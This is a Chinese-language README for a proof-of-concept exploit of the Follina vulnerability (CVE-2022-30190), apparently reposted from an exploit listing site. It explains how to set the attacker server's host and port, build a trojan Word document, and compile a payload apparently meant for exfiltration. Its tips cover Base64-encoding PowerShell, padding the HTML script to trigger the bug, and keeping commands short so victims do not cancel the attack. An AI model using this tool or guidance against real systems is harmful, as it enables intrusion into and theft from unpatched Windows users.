## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WINSTXNHDW-CVE-2022-30190
# CVE-2022-30190(Follina)
 
针对CVE-2022-30190(Follina)的概念验证(PoC)。
## 环境要求
### 受害者
* Windows 10 21H1(等效/更早版本)
* 未安装安全更新KB5016616
### 攻击者
* Microsoft .NET SDK
* Python 3.9 或更高版本
## 配置
编辑`config.xml`以修改攻击者的服务器主机名和端口号。
root@kitploit:~
<host>
<name>{ hostname }</name>
<port>{ port }</port>
</host>
## 使用说明
### 木马
以下Python脚本将构建`trojan.docx`文件并初始化攻击者的服务器。
root@kitploit:~
python init.py
### 有效载荷
使用以下命令构建有效载荷并删除所有不必要的二进制文件。
root@kitploit:~
dotnet publish LocalEXF
### 清理
运行以下批处理脚本永久删除此目录及其所有内容。
root@kitploit:~
.\destroy_all.bat
## 重要提示
* 要执行复杂PowerShell命令(如本PoC),这些命令**必须** 进行Base64编码。
* index.html 必须在 `<script>` 标签内包含至少4096字节的数据。
* 所有参数必须按照 href.txt 中的描述使用。
* Microsoft Word 无法使用 index.html 文件执行JavaScript。但出于某种原因,`location.href` 可以工作。
* 对于调用长时间运行任务的命令,当受害者加载文档时将出现故障排除程序。受害者可能会意外取消故障排除程序而拒绝攻击。请确保命令运行时长短。